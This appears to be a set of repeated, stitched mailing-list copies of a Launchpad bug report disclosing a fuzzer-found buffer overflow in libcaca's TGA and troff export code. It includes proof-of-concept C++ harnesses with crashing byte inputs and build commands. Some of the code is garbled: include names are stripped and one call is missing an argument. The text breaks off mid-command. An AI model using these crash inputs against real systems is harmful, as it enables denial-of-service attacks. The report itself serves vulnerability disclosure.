$ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow
Debian 10 libcaca0/now 0.9.beta19-2.1 Fedora 33 Name: libcaca version : 0.99 Release :0.51.beta19.fc33 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: libcaca buffer-overflow Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g
[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow
source code ## Affected Product Code Base libcaca, 0.99.beta20 Ubuntu 20.04 libcaca 0.99.beta19 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: libcaca buffer-overflow Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_tga.cc -O2